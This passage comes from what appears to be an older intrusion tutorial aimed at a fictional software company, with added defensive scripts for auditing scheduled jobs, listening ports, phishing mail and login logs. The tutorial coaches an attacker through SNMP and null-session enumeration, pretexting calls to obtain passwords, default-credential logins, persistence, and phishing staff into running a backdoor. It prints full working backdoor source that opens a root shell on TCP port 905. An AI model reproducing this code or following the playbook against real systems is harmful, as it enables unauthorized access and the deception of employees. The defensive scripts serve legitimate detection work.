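# snmp_users <community> <host>: the Windows account names via SNMP
snmp_users() {
  snmpwalk -v1 -c "$1" "$2" "$LANMAN_USERS_OID" | parse_lanman_users
}

# parse_lanman_users: print the quoted STRING value of every row on stdin
# (net-snmp encodes the index as length + ASCII bytes and repeats the name)
parse_lanman_users() {
  awk -F'"' '/= STRING: "/ { print $2 }'
}

SAMPLE_WALK='SNMPv2-SMI::enterprises.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.6.115.101.114.103.101.121 = STRING: "sergey"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.8.73.85.83.82.95.83.67.67 = STRING: "IUSR_SCC"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114.97.116.111.114 = STRING: "Administrator"'

sample_users() { printf '%s\n' "$SAMPLE_WALK" | parse_lanman_users; }

sample_users
```

The same parser works for the share table (.1.3.6.1.4.1.77.1.2.27) and the running service table
(.1.3.6.1.4.1.77.1.2.3.1.1) of the same MIB; only the OID handed to snmpwalk changes.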

Some samples of snmp output:

• (partial) description of a router
• (partial) description of a Linux system
• (partial) description of a Windows system
• a list of user accounts on a Windows system

Service specific information

With the information gathered so far, you may have discovered new ways to find out more about
the network you're aiming at. For instance, if you found that some hosts run NetBIOS / SMB
(ports 137-139, and 445 from Windows 2000 on), this can be used to retrieve additional
information about user names, computer names, possibly also network shares and so on:
'nbtstat -A <address>' lists the NetBIOS name table, and a 'null session'
(net use \\host\ipc$ "" /u:"") followed by 'net view \\host' lists the shares and, with tools such
as enum, the user accounts - if the administrator left anonymous enumeration enabled.

To get some insight in the LAN layout, you might send an email to info@silly.com, get a reply,
and read the headers to see how that reply got from the sender (with his IP address and/or host
name) to the mail servers. Or use one of the email addresses you've found so far.

Received: from PC_212 (adsl2256.ppp.my.com [207.201.179.14])

Asking for a read receipt, and looking at the headers when you get it, can also tell you a few
things about how mail reaches its destination at The Silly Software Company and thus (partially)
illustrate the layout of the network.
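
An added example (not from the original page) that reads a reply's headers and prints the path
the message took, oldest hop first: each mail server prepends its own Received: line, so the chain
is read bottom-up. The message below is constructed around the Received: line quoted above.
Only the Received: lines added by servers you trust (your own, and your provider's) are reliable;
anything further down the chain may have been forged by the sender.

```sh
#!/bin/sh
# Added example (not from the original page): print the hops a message took,
# oldest first, from its Received: headers.  The message below is constructed
# around the Received: line quoted in the text.
SAMPLE_MESSAGE='Return-Path: <info@silly.com>
Received: from mail.silly.com (mail.silly.com [207.204.120.8])
  by mx.my.com (Postfix) with ESMTP id 4F2A1
  for <you@my.com>; Sat, 27 Mar 2004 12:01:02 +0100
Received: from central.silly.com (central.silly.com [207.204.120.5])
  by mail.silly.com with SMTP; Sat, 27 Mar 2004 11:59:50 +0100
Received: from PC_212 (adsl2256.ppp.my.com [207.201.179.14])
  by central.silly.com (Lotus Domino) id 1234; Sat, 27 Mar 2004 11:59:40 +0100
From: info@silly.com
Subject: Re: your question

Thanks for asking, we will get back to you.'

# mail_path: read a message on stdin, print "from=<name> ip=<addr> by=<name>"
# per hop in the order the message travelled.  Every server prepends its own
# Received: line, so the bottom one is the first hop.
mail_path() {
  awk '
    /^$/ { inbody = 1 }                      # headers end at the first blank line
    inbody { next }
    /^[ \t]/ { h[n] = h[n] " " $0; next }    # unfold continuation lines
    { n++; h[n] = $0 }
    END {
      for (i = n; i >= 1; i--) {
        if (h[i] !~ /^Received:/) continue
        line = h[i]; sub(/^Received:[ \t]*/, "", line)
        from = "?"; by = "?"; ip = "?"
        if (match(line, /^from[ \t]+[^ \t]+/)) {
          from = substr(line, RSTART, RLENGTH); sub(/^from[ \t]+/, "", from)
        }
        if (match(line, /[ \t]by[ \t]+[^ \t]+/)) {
          by = substr(line, RSTART, RLENGTH); sub(/^[ \t]+by[ \t]+/, "", by)
        }
        if (match(line, /\[[0-9.]+\]/)) ip = substr(line, RSTART + 1, RLENGTH - 2)
        print "from=" from " ip=" ip " by=" by
      }
    }'
}

sample_path() { printf '%s\n' "$SAMPLE_MESSAGE" | mail_path; }

sample_path
```

In the constructed message the first hop shows an internal workstation name (PC_212) handing
the mail to central.silly.com, which in turn relays through mail.silly.com: two internal hosts and
their roles, from one reply.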

Social Engineering

So far, we've only collected information that is readily available, because the internet as it is
would not be able to function without it, and information that can be readily retrieved if sloppy
sysadmins forget to take precautions against it. Next, all we did was put two and two together. To
find out more, we'd have to either target specific holes in the security, or use so-called "social
engineering".

Social engineering is kind of a euphemism. To fill the gaps in the information you've collected
so far, you may resort to dirty tricks such as calling the receptionist at the Silly Software Company,
telling her you're the helpdesk and could she please tell you her password because you need to check
something. She might just give it. She may also tell you the login name and password of her boss,
who is such a moron that she always needs to help him whenever he's at a loss with some
computer thing.
You may also start hanging out at the place where the Silly Software techies hang out for lunch,
for happy hour, or on Friday after work, and hear them tell stories about how stupid their
colleagues are, or so. Stories that may contain interesting details about the IT systems in the
company. Interesting details that help you understand what your target looks like, and where the
weak points may be.

Another approach could be to visit newsgroups and forums, and look for entries related to the
company you're targeting, or the names of its employees. One of the network administrators might
have asked for help regarding a problem that could be of particular interest.

So, social engineering has nothing to do with engineering, nothing to do with network protocols
or data communication - it's just exploiting human weakness, but it's called social engineering to
make it fit the picture of the intelligent, technology oriented whizz that can get into any system.

Nonetheless, it goes to show that the human factor can be one of the weak points in a well
protected system, so it's good to be aware of it.

Point of Attack

At this point, we have an idea what the local network at the Silly Software Company may look
like, we know where on the internet we can find them, we have some indications of the software
they're running, we have some background information about the company, and maybe its
employees, and so on. Time to decide how to proceed. A lot depends on what you're after.

We could target one of the servers, e.g. the mail server or the system with hostname 'gate', either
as the final goal or as a way to penetrate deeper into the network (they may accept actions from
their own servers that they don't accept from external systems, so some level of control over that
server may get us further ...).

Mail servers are a popular target, because they hold user accounts: logins, passwords. They must
be publicly accessible for mail to be delivered, and they are also trusted by the other hosts on the
network, so they can be used as point of entry. They also hold the mail messages, if that's what
you're after. Or mail messages may contain information that can help you penetrate deeper into
the network.

We have some information about ports that we can connect to (and the services that will reply,
maybe the operating systems, etc.). That may open opportunities, if there are known security
issues with that software. In a case like this, it may be worth a try to get a pcAnywhere client or
VNC client and try to connect to the hosts listening for pcAnywhere or VNC. If the network
administrator did a sloppy job, some factory settings (default users, passwords, ...) may still be
active, and you walk right in.

Method of Attack

The method of attack will be adapted to the point of attack, discussed previously, because it is, at
least partially, dictated by the software you find on the target system. There are several ways.
Maybe you can locate and retrieve the password file, so when you have that, you can try to
connect to the system as a legitimate user, and take it from there. Or maybe one of the services is
susceptible to a buffer overflow exploit, which might allow you to open a shell (a command
prompt) from where you can access the system, maybe create a superuser account for yourself,
or so. There are also rootkits: collections of tools that, once you have 'root' (system
administrator) privileges, replace system programs or kernel components to hide your presence
and keep your access. Or maybe you have sufficient access to drop a 'Trojan Horse' on the
system, that will let you right in next time.

Your first attack may also be aimed at just collecting additional information for future attacks:
grab a password list, find a way to get a packet sniffer on the network to read the data that are
being transmitted, etc.

Another typical method is to gain access to the network with limited privileges, as guest, or with
anonymous FTP or something similar, then apply some tricks or exploit some sysadmin
sloppiness to upgrade your account, upload a rootkit, steal the password file, ... in order to get
control ("own the system"). Here's a description of how an FTP server with some configuration
mistakes resulted in complete 'root' access to a server: How we defaced apache.org
(http://www.dataloss.net/papers/how.defaced.apache.org.txt).

Leave the back door open

After you've gone through all this trouble, you don't want to shut yourself out, so you'll leave a
way to sneak in more easily next time. Create a user account (and remember the password), leave
a back door program that you can connect to without hassle, etc.

Tools for this kind of activity can be readily found on the web. Of course, you will have to trust
the guy who created them: his virus creation tool or trojan construction tool may well include a
few lines of code that create a backdoor on your own system as well. :-)

Here are a couple of examples I found without too much trouble. I haven't tried them so I don't
know if they will work. I include them because they're easy to understand examples of how
features of the operating system on the target can be exploited if the sysadmin is a bit naive. For
systems with less naive sysadmins, I'm sure there are more sophisticated tricks out there.

Windows NT

Windows NT (and other Microsoft Windows systems) still know the autoexec.bat. On DOS and
Windows 9x this script runs at every boot; NT only parses it for environment variables (PATH
and SET statements, if the ParseAutoexec registry value allows it) and does not execute the
commands in it, so on NT the places to put a command that runs at boot or logon are the Run and
RunOnce registry keys under HKLM\Software\Microsoft\Windows\CurrentVersion and the
Startup folders. NT also has the AT command, which hands commands, scripts or programs to the
Schedule service to be executed at a given date/time or on a given schedule - and the Schedule
service runs them as SYSTEM. This is often considered God's gift to crackers: whatever you
manage to schedule runs on the targeted system with the highest privileges there are. One can
imagine an intruder adding a few lines to one of the startup locations, then waiting for the system
to be rebooted (or getting it to reboot by causing it to crash).

Another fine tool is getadmin.exe, a program that uses a flaw in Windows NT 4.0 to add the user
account of your choice to the Administrators group, thus giving that account full Administrator
privileges. getadmin.exe is a bit outdated (the flaw was patched by a hotfix back in 1997) - but
you get the idea. And there are probably other tools out there.

Another way of doing it may be like this: hacking NT, using FTP to upload files to the targeted
machine.

Once you are Administrator, there is no limit to what you can do. With VBS, you can execute
any administrator task on the remote machine, including creating new accounts (in case the one
you're using is found and removed) or changing passwords.
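From the administrator's side, the two persistence tricks just described leave traces that are easy to review: a scheduled job that launches something from an odd place, and an account that was not in the Administrators group when the machine was built. The script below is an added example, not part of the original text; it works on constructed samples shaped like the output of `schtasks /query /fo CSV /v` and `net localgroup Administrators`. Only the "TaskName" and "Task To Run" columns are relied upon; the rest of the column set, the host name SILLY-NT and the baseline membership are assumptions for the example.

```python
# Added example: audit scheduled jobs and Administrators-group membership
# from constructed command output (not the tutorial's own code).
import csv
import io
import re

# Places a legitimately installed job rarely runs from: temp dirs, user profiles, the FTP root.
SUSPICIOUS_PATHS = re.compile(
    r"(\\temp\\|\\tmp\\|%temp%|\\users\\[^\\]+\\|\\inetpub\\ftproot\\)", re.IGNORECASE)
# Interpreters and account-management commands seldom seen in vendor-installed jobs.
SUSPICIOUS_CMDS = re.compile(
    r"\b(cmd(\.exe)?\s+/c|cscript|wscript|net\s+(user|localgroup))\b", re.IGNORECASE)

# Constructed sample in the shape of `schtasks /query /fo CSV /v` (column subset assumed).
SAMPLE_TASKS_CSV = (
    '"HostName","TaskName","Task To Run","Run As User"\n'
    '"SILLY-NT","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","%windir%\\system32\\defrag.exe -c","SYSTEM"\n'
    '"SILLY-NT","\\At1","cmd.exe /c C:\\TEMP\\svchost.exe","SYSTEM"\n'
    '"SILLY-NT","\\At2","net localgroup Administrators tempuser /add","SYSTEM"\n'
)


def flag_scheduled_tasks(csv_text):
    """Return [(task name, command)] for jobs whose command looks hand-planted."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        cmd = row.get("Task To Run") or ""
        if SUSPICIOUS_PATHS.search(cmd) or SUSPICIOUS_CMDS.search(cmd):
            findings.append((row["TaskName"], cmd))
    return findings


# Constructed sample in the shape of `net localgroup Administrators` output.
SAMPLE_NET_LOCALGROUP = (
    "Alias name     Administrators\n"
    "Comment        Administrators have complete and unrestricted access to the computer/domain\n"
    "\n"
    "Members\n"
    "\n"
    "-------------------------------------------------------------------------------\n"
    "Administrator\n"
    "SILLY\\Domain Admins\n"
    "tempuser\n"
    "The command completed successfully.\n"
)

# Membership recorded when the box was built (assumed baseline for the example).
BASELINE_ADMINS = {"Administrator", "SILLY\\Domain Admins"}


def parse_local_group_members(text):
    """Member names from `net localgroup <group>` output: the lines between the dashed rule and the trailer."""
    members, in_members = [], False
    for line in text.splitlines():
        line = line.rstrip()
        if line.startswith("---"):
            in_members = True
            continue
        if in_members:
            if not line or line.startswith("The command completed"):
                break
            members.append(line)
    return members


def admin_group_drift(text, baseline=BASELINE_ADMINS):
    """Accounts in the group now that were not in the baseline (what a getadmin-style tool leaves behind)."""
    return sorted(set(parse_local_group_members(text)) - baseline)


if __name__ == "__main__":
    for name, cmd in flag_scheduled_tasks(SAMPLE_TASKS_CSV):
        print(f"review scheduled job {name}: {cmd}")
    for account in admin_group_drift(SAMPLE_NET_LOCALGROUP):
        print(f"new Administrators member: {account}")
```

The path and command patterns are a starting point, not a complete list; the useful part is comparing against a baseline taken when the system was known to be clean, which is also what catches an autoexec.bat that grew a few extra lines.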

Linux / Unix

The following trick is supposed to work on Unix / Linux systems: upload a script that contains
the source code (in C) of a backdoor program, plus some shell commands to compile and run it
on the targeted system using that system's own C compiler (gcc, usually present by default on any
Linux / Unix-like system).

#!/bin/sh
# Fearless Rootkit R-Type v0.1
# Coded by Merlion
#
# If you do, you do so at your OWN risk

# Write the C source of the backdoor to a temporary file ...
cat > /tmp/rootd.c << EOF

#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>

void die(char *error);

main(int argc, char **argv) {
    pid_t pid, sid;
    int len, clipid, serpid, stat, sock, soklen, sockbind, sockrec,
        sockopt, sockcli, socklen;
    unsigned short int mcon;
    unsigned short int port;
    char *rbuf, *rmode;
    struct sockaddr_in Client, Server;

    /* a listening TCP socket on port 905, bound to every interface */
    if ((sock=socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) die("Error creating socket");
    if (argc != 3) die("Usage");
    memset(&Server, 0, sizeof(Server));
    Server.sin_family=AF_INET;
    port=905;
    mcon=5;
    Server.sin_port=htons(port);
    Server.sin_addr.s_addr=htonl(INADDR_ANY);
    if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, (void *) &sockopt, sizeof(sockopt)) < 0)
        die("No socket options set");
    if (sockbind=bind(sock, (struct sockaddr *) &Server, sizeof(Server)) != 0)
        die("Could not bind socket");
    if ((sockbind=listen(sock, mcon)) != 0) die("Failed on listen()");

    /* detach from the terminal and keep running as a daemon */
    pid=fork();
    if (pid < 0) die("Initial fork() failed");
    if (pid>0) exit(0);
    if ((chdir("/")) < 0) die("Could not set working directory");
    if ((setsid()) < 0) die("setsid() failed in creating daemon");
    umask(0);
    close(STDIN_FILENO);
    close(STDOUT_FILENO);
    close(STDERR_FILENO);

    /* for every incoming connection: fork, point stdout at the client, hand it /bin/sh */
    while(1) {
        socklen=sizeof(Client);
        if ((sockcli=accept(sock, (struct sockaddr *) &Client, &socklen)) < 0) exit(1); /* syslog msg here still */
        clipid=getpid();
        serpid=fork();
        if (serpid > 0)
            waitpid(0, &stat, 0);
        dup2(sockcli, 1);
        execl("/bin/sh","sh",(char *)0);
    }
    close(sockcli);
}

void die(char *error) {
    fprintf(stderr, "%s\n", error);
    exit(1);
}

EOF

# ... compile it into /bin, remove the source, and start it
gcc -o /bin/rootd /tmp/rootd.c
rm -f /tmp/rootd.c
/bin/rootd

echo "Rootd successfully installed"

exit 0
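Whatever else it does, a backdoor of this kind has to sit on a port waiting for its owner, and on Linux every such socket appears in the kernel's /proc/net/tcp table, with addresses and ports written in hex. The following is an added example for the sys admin's side, not code from the tutorial or from the rootkit above: it parses that table and reports listeners that are not on the host's list of expected services. The table contents and the allowlist are constructed for the example; on a real host you would feed it the actual contents of /proc/net/tcp (and /proc/net/tcp6).

```python
# Added example: find TCP listeners that are not on the expected-services list,
# reading the /proc/net/tcp format. Sample table and allowlist are constructed.
import socket
import struct

LISTEN = "0A"  # TCP state code for LISTEN in /proc/net/tcp

# Constructed sample: sshd (22) and httpd (80) on all interfaces, smtp (25) on
# loopback, one established ssh session, and a stray listener on 905 (0x0389).
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1001 1 0000000000000000 100 0 0 10 0
   1: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000    33        0 1002 1 0000000000000000 100 0 0 10 0
   2: 0100007F:0019 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1003 1 0000000000000000 100 0 0 10 0
   3: 00000000:0389 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1004 1 0000000000000000 100 0 0 10 0
   4: 0500000A:0016 1700000A:C3A1 01 00000000:00000000 00:00000000 00000000     0        0 1005 1 0000000000000000 20 4 30 10 -1
"""

# Services this host is supposed to offer, as (address, port); "0.0.0.0" means any interface.
ALLOWED_LISTENERS = {("0.0.0.0", 22), ("0.0.0.0", 80), ("127.0.0.1", 25)}


def decode_addr(hex_addr):
    """'0100007F:0019' -> ('127.0.0.1', 25). The address is printed in host byte order (little-endian on x86)."""
    ip_hex, port_hex = hex_addr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def parse_listeners(table):
    """Yield (ip, port, uid, inode) for every socket in LISTEN state."""
    for line in table.splitlines()[1:]:          # first line is the column header
        fields = line.split()
        if len(fields) < 10 or fields[3] != LISTEN:
            continue
        ip, port = decode_addr(fields[1])
        yield ip, port, int(fields[7]), fields[9]


def unexpected_listeners(table, allowed=ALLOWED_LISTENERS):
    """Listeners outside the allowlist. An allowed wildcard-bound port also covers that port on a specific address."""
    allowed_any_addr = {port for addr, port in allowed if addr == "0.0.0.0"}
    findings = []
    for ip, port, uid, inode in parse_listeners(table):
        if (ip, port) in allowed or port in allowed_any_addr:
            continue
        findings.append({"ip": ip, "port": port, "uid": uid, "inode": inode})
    return findings


if __name__ == "__main__":
    # On a live Linux host: unexpected_listeners(open("/proc/net/tcp").read())
    for f in unexpected_listeners(SAMPLE_PROC_NET_TCP):
        print(f"unexpected listener {f['ip']}:{f['port']} (uid {f['uid']}, socket inode {f['inode']})")
```

The socket inode is the handle to the process: the listener's owner is whichever /proc/&lt;pid&gt;/fd entry links to `socket:[inode]`. Since an intruder who has replaced system binaries may also hide the socket from tools on the box, a port scan of the host from a separate machine is the usual cross-check, and a known-good copy of the expected-services list should live somewhere other than the host being checked.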

more ...

More elaborate stuff can be found on the Web, like here:

• Fearless
• http://www.packetstormsecurity.org/UNIX/penetration/rootkits/ : Unix tools
• http://www.packetstormsecurity.org/NT/ : Windows NT tools
• more tutorials, howto's, and tools

Next ...
So, you have access to the Silly Software Company's resources. Now what? The decent thing to
do would be to warn them about the security holes in their system, e.g. by sending the system
administrator an email explaining what you've done. If you send the mail from within their
system, like from the sys admin's own email account, it's more impressive, and it proves you're
not joking.

The black hat approach would now be to use their system for your own benefit: stealing
information, installing an FTP server to distribute 'warez', using their computers as zombies for a
Denial of Service attack against your next victim, using their mail system to start spreading
viruses, running your next intrusion from one of their computers so that it won't be traced back to
you, or whatever.

Typically, the intruder will also try to cover his tracks by modifying log files, creating hidden files
or folders to conceal whatever has been uploaded, or placing his tools in folders with normal-
sounding names or under file names that look as if they belong to the system. A system
administrator would need to know his system quite well to notice these changes.

Shortcuts

There are a couple of ways to shortcut the above procedure. For starters, it helps if you're already
on the inside. 80 % of all 'intrusions' are done from within, i.e. by employees. That saves the
trouble of having to penetrate the network from the outside. Also, employees already have
accounts, so their goal would be to find a way to get superuser privileges (privilege escalation), or
to find holes, inconsistencies or mistakes in the access privileges that would allow them access to
information they were not intended to see or modify. At the least, they only have to look at their
own account to see what format usernames and passwords have, which might help.

Penetrating a network is also easier if someone lets you in. You may send emails to The Silly
Software Company's employees and make it look as if they come from the system administrator
(you know his email address from the DNS lookup!). If you can convince them to execute a
certain program ("here's a patch that will repair the problem you've had with your computer. Just
open the attachment" - that should work: everyone has had problems with computers before ...),
you can try and have them install a backdoor that you can use to get in.
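The mail just described has a recognisable shape, and it is the shape a mail gateway or a "report this as phishing" triage script looks for: a From: address claiming to be the sysadmin, a message that actually entered the mail system through some outside relay, and an executable attachment. The script below is an added example, not from the original text; it uses Python's standard email parser on a constructed message. The company domain silly.com, the relay and the addresses are all made up for the example.

```python
# Added example: flag the tell-tale signs of a mail that pretends to come from
# an internal sender. The message, domains and hosts are constructed.
import re
from email import message_from_string
from email.utils import parseaddr

INTERNAL_DOMAIN = "silly.com"  # assumed company domain for the example
EXECUTABLE_SUFFIXES = (".exe", ".com", ".bat", ".cmd", ".scr", ".pif", ".vbs", ".js")

SAMPLE_MAIL = """\
Return-Path: <bounce@mail-relay.example.net>
Received: from mail-relay.example.net (203.0.113.10) by mx.silly.com; Mon, 4 Mar 2002 09:12:00 +0100
From: "System Administrator" <sysadmin@silly.com>
To: jean-claude.vandamme@silly.com
Subject: Patch for the problem you had with your computer
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="XYZ"

--XYZ
Content-Type: text/plain

Here's a patch that will repair the problem you've had with your computer. Just open the attachment.

--XYZ
Content-Type: application/octet-stream; name="patch.exe"
Content-Disposition: attachment; filename="patch.exe"
Content-Transfer-Encoding: base64

Q09OU1RSVUNURUQgU0FNUExFLCBOT1QgQSBQUk9HUkFN
--XYZ--
"""


def domain_of(header_value):
    """Domain part of the first address in a From:/Return-Path: header, lower-cased."""
    addr = parseaddr(header_value)[1]
    return addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""


def first_hop_host(msg):
    """Host named in the earliest Received: header, i.e. where the mail entered our mail system.
    Received: headers are prepended as the mail travels, so the earliest is the last one."""
    received = msg.get_all("Received") or []
    if not received:
        return ""
    m = re.match(r"\s*from\s+(\S+)", received[-1])
    return m.group(1).lower() if m else ""


def phishing_indicators(raw_message):
    """Return a list of human-readable warning signs found in the message (empty = nothing seen)."""
    msg = message_from_string(raw_message)
    findings = []

    from_dom = domain_of(msg.get("From", ""))
    return_path_dom = domain_of(msg.get("Return-Path", ""))
    if from_dom and return_path_dom and from_dom != return_path_dom:
        findings.append(f"From: domain {from_dom} differs from Return-Path domain {return_path_dom}")

    hop = first_hop_host(msg)
    if from_dom == INTERNAL_DOMAIN and hop and not hop.endswith(INTERNAL_DOMAIN):
        findings.append(f"claims internal sender but entered via external host {hop}")

    for part in msg.walk():
        filename = part.get_filename()
        if filename and filename.lower().endswith(EXECUTABLE_SUFFIXES):
            findings.append(f"executable attachment {filename}")
    return findings


if __name__ == "__main__":
    for finding in phishing_indicators(SAMPLE_MAIL):
        print("warning:", finding)
```

None of the three checks is proof by itself (mailing lists and forwarding legitimately break the first two), which is why the output is a list of indicators for a human or a scoring rule rather than a verdict; the attachment check is the one most sites simply enforce at the gateway.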

Conclusion

The availability of DNS and RIPE information is part of the design. DNS, RIPE ('whois'), and
other online databases are necessary for the internet to function. There is also nothing wrong
with servers having publicly accessible ports / services - you can't run a web server without
allowing people to connect to its port 80. On the other hand, all this information combined can
tell an attacker more than you expect. Lists of networks, IP addresses and routes may allow an
attacker to draw a map of your networks and make educated guesses about additional private
networks, routes, and possibly VPN tunnels. Private IP addresses can be used for address spoofing
so that packets appear to be coming from a trusted network. User names and email addresses can be
used in social engineering or to make educated guesses about account names. A list of installed
software or running services, and their patch level (e.g. from SNMP), greatly simplifies the search
for vulnerabilities or exploits. If someone has a list of user accounts, all he needs to do is find a
matching password - way easier and faster than having to guess (brute-force, word list, ...) user
name / password combinations.

So, while you cannot avoid having some info publicly accessible, a security-aware system
administrator should really consider what information is to be made public, and to whom - and
take steps to implement that instead of accepting whatever defaults came with the package. A
few simple steps will greatly reduce your exposure:

• use generic email addresses (e.g. ict_dept@silly.com instead of jean-claude.vandamme@silly.com)
• don't let DNS servers do zone transfers to other servers except your own
• don't show internal hosts / addresses in public DNS. Use separate servers for internal and
external addresses. Don't let public DNS servers do recursive lookups on your private
DNS servers.
• replace those default passwords (and SNMP communities)
• disable services you don't need
• use a firewall and access control lists to limit communication to only those source and
destination addresses / networks / hosts that need to be talking to each other
• log connection and log-in attempts and check the logs regularly
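The last point is worth a concrete illustration, because "check the logs regularly" in practice means having something pick out the two events that matter: a source hammering away at passwords, and the moment one of those guesses succeeds. The script below is an added example (not part of the original text) that does exactly that over a handful of constructed sshd log lines in standard syslog format; the host name, addresses and accounts are made up, and the year is passed in by the caller because syslog timestamps don't carry one. It also serves the earlier remark about intruders editing log files: this kind of check only means something if it runs against a copy of the logs shipped to a separate log host, where the intruder's edits on the compromised machine don't reach.

```python
# Added example: spot password guessing and the guess that worked in sshd
# syslog lines. The log lines below are constructed, not real captures.
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+\s[\d:]{8}) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)"
)

SAMPLE_LOG = """\
Mar  4 09:10:01 www sshd[4121]: Accepted publickey for admin from 10.0.0.23 port 50102 ssh2
Mar  4 09:12:14 www sshd[4130]: Failed password for root from 203.0.113.7 port 41022 ssh2
Mar  4 09:12:16 www sshd[4131]: Failed password for root from 203.0.113.7 port 41023 ssh2
Mar  4 09:12:19 www sshd[4132]: Failed password for invalid user oracle from 203.0.113.7 port 41024 ssh2
Mar  4 09:12:22 www sshd[4133]: Failed password for jean-claude from 203.0.113.7 port 41025 ssh2
Mar  4 09:12:25 www sshd[4134]: Failed password for jean-claude from 203.0.113.7 port 41026 ssh2
Mar  4 09:12:40 www sshd[4135]: Accepted password for jean-claude from 203.0.113.7 port 41027 ssh2
Mar  4 09:30:00 www sshd[4150]: Failed password for admin from 10.0.0.23 port 50110 ssh2
"""

THRESHOLD = 5         # this many failures from one source ...
WINDOW_SECONDS = 300  # ... within this many seconds counts as password guessing


def parse(lines, year=2002):
    """Turn log lines into (timestamp, source ip, user, outcome) tuples; lines that aren't logins are skipped."""
    events = []
    for line in lines.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"], m["outcome"]))
    return events


def guessing_sources(events, threshold=THRESHOLD, window=WINDOW_SECONDS):
    """{source ip: total failures} for sources with >= threshold failures inside any `window`-second span."""
    failures = defaultdict(list)
    for ts, ip, _user, outcome in events:
        if outcome == "Failed":
            failures[ip].append(ts)
    flagged = {}
    for ip, times in failures.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            if (times[i + threshold - 1] - times[i]).total_seconds() <= window:
                flagged[ip] = len(times)
                break
    return flagged


def success_after_failures(events, min_failures=3):
    """Logins that succeeded from a source that had just been failing: the guess that worked."""
    failures = defaultdict(int)
    hits = []
    for ts, ip, user, outcome in events:
        if outcome == "Failed":
            failures[ip] += 1
        elif failures[ip] >= min_failures:
            hits.append((ip, user, ts.strftime("%b %d %H:%M:%S")))
    return hits


if __name__ == "__main__":
    events = parse(SAMPLE_LOG)
    for ip, count in guessing_sources(events).items():
        print(f"password guessing from {ip}: {count} failures")
    for ip, user, when in success_after_failures(events):
        print(f"successful login for {user} from {ip} at {when} after repeated failures")
```

The same two questions apply to any login log (FTP, POP, a Windows security log): how many failures from one place in how little time, and did a success follow. The thresholds are deliberately parameters; what counts as noise on a public SSH server is an alarm on a server that should only ever see logins from the office network, which is the point of the firewall rule two bullets up.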
